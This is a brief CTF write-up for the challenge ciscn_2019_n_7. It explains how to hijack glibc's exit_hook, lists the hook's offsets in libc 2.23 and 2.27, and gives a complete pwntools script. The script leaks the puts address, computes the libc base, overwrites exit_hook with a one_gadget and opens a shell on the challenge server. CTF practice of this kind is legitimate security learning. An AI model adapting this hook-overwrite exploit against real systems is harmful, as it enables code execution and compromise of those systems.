ciscn_2019_n_7 (hijacking exit_hook)
This post records the exit_hook hijacking type of challenge, using this problem as the example.
Location of exit_hook:

```
Location of exit_hook
In libc-2.23:
exit_hook = libc_base+0x5f0040+3848
exit_hook = libc_base+0x5f0040+3856
In libc-2.27:
exit_hook = libc_base+0x619060+3840
exit_hook = libc_base+0x619060+3848
```
The hook does not require an explicit call to exit; it is also reached when the program returns normally.
In this challenge, calling exit from the menu directly also closes the output stream, so nothing is echoed back.
```python
from pwn import *

io = remote('node4.buuoj.cn', 25032)
elf = ELF('./ciscn_2019_n_7')
context.log_level = "debug"
context.arch = 'amd64'
context.os = "linux"
libc = ELF('./libc-2.23-64.so')

def add(length, name):
    io.recvuntil(b'choice-> ')
    io.sendline(b'1')
    io.recvuntil(b'Length:')
    io.sendline(str(length).encode())   # pwntools expects bytes, not str
    io.recvuntil(b'name:')
    io.send(name)

def edit(name, content):
    io.recvuntil(b'choice-> ')
    io.sendline(b'2')
    io.recvuntil(b'name')
    io.send(name)
    io.recvuntil(b'contents')
    io.send(content)

def leak():
    # menu option 666 prints the runtime address of puts
    io.recvuntil(b'choice-> ')
    io.sendline(b'666')

leak()
io.recvuntil(b'0x')
put_got = int(io.recv(12), 16)          # leaked address of puts

libc_base = put_got - libc.sym['puts']
log.success('libc_base => ' + hex(libc_base))
exit_hook = libc_base + 0x5f0040 + 3848  # libc-2.23 offset from the table above
one = libc_base + 0xf1147               # one_gadget address

# 8-byte name followed by the exit_hook address
add(0x20, b'a'*8 + p64(exit_hook))
# editing this entry writes the one_gadget address into exit_hook
edit(b'a'*8, p64(one))
# any input that makes the program return triggers the hook
io.sendlineafter(b'-> \n', b's')
io.interactive()
```
